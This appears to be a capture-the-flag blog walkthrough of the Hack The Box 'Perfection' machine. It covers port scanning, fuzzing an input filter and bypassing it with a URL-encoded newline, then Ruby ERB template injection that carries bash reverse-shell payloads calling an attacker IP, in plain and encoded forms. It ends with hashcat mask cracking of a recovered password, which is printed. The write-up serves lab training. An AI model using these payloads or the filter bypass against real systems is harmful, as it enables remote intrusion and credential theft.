Post

HTB - Perfection

Posted
Hack the Box - Perfection.
Hack the Box - Perfection.
By racc0x
1 min read

Box Info

NamePerfection
Release Date02 Mar, 2024
OSLinux
Rated DifficultyEasy

Enumeration

1
2

nmap -p- --open --min-rate 5000 -n -sS -vvv -Pn 10.10.11.253 -oG allPorts
nmap -sCV -p 22,80 10.10.11.253 -oN targeted

Image

Resolution DNS

1

echo "10.10.11.253 perfection.htb" | sudo tee -a /etc/hosts

Technology

1

whatweb http://perfection.htb

Image

Web

Image

The web is powered by WEBrick version 1.7.0, WEBrick is a Ruby library providing simple HTTP web servers

Image

Well, if you intercept the request u can see something like this category1=literature but if u try to this category1=$ get a redirect with a text “Malicious text blocked”.

We can do with ffuf an scan for get a list of blocked characters.

1

ffuf -u http://10.10.11.253/weighted-grade-calc -d 'category1=FUZZ&grade1=90&weight1=30&category2=poop&grade2=100&weight2=50&category3=poop&grade3=100&weight3=20&category4=N%2FA&grade4=0&weight4=0&category5=N%2FA&grade5=0&weight5=0' -w /opt/SecLists/Fuzzing/alphanum-case-extra.txt -mr Malicious

But what happens if a url encode the input?

1

category1= poop%0aFUZZ &grade1=90&weight1=30&category2=poop&grade2=100&weight2=50&category3=poop&grade3=100&weight3=20&category4=N%2FA&grade4=0&weight4=0&category5=N%2FA&grade5=0&weight5=0' -w /opt/SecLists/Fuzzing/alphanum-case-extra.txt -mr Malicious

%0a— represents a newline character, used to bypass input validation.

The first thing I think is that there may be an SSTI. We go look to in payloadallthethings if there is something for ruby

PaylaodsAllTheThings-Ruby

Image

hURL to encode and decode payloads showcases the manipulation of data to exploit web application vulnerabilities. The payload crafted for the Weighted Grade Calculator application is designed to execute a reverse shell command, taking advantage of any potential server-side code execution vulnerabilities

1

hURL -B "bash -i >& /dev/tcp/10.10.14.78/7777 0>&1" (base64)

1

hURL -U "{_stringbase64_}" (URLencoded)

Image

Payload

1

category1=poop%0a<%25=system("echo+YmFzaCAtaSA%2BJiAvZGV2L3RjcC8xMC4xMC4xNC40OC83Nzc3IDA%2BJjE%3D|+base64+-d+|+bash");%25>1

Image

Or use the payload <%= IO.popen('id').readlines() %> and urlencoded.

Image

Hacktricks-SSTI

1

<%= IO.popen('bash -i >& /dev/tcp/10.10.14.78/7777 0>&1').readlines() %>

Image

Enumerating found the file .db and got the credentials.

A string is any sequence of 4 or more printable characters .db

Image

Privilege Escalation

Image

Hashcat

1

hashcat -m 1400 hash.txt -a 3 "susan_nasus_?d?d?d?d?d?d?d?d"

Image

Image

1

susan_nasus_413759210

Image

Root

hackthebox, Perfection
HackTheBox SSTI sudo nmap hashcat
This post is licensed under CC BY 4.0 by the author.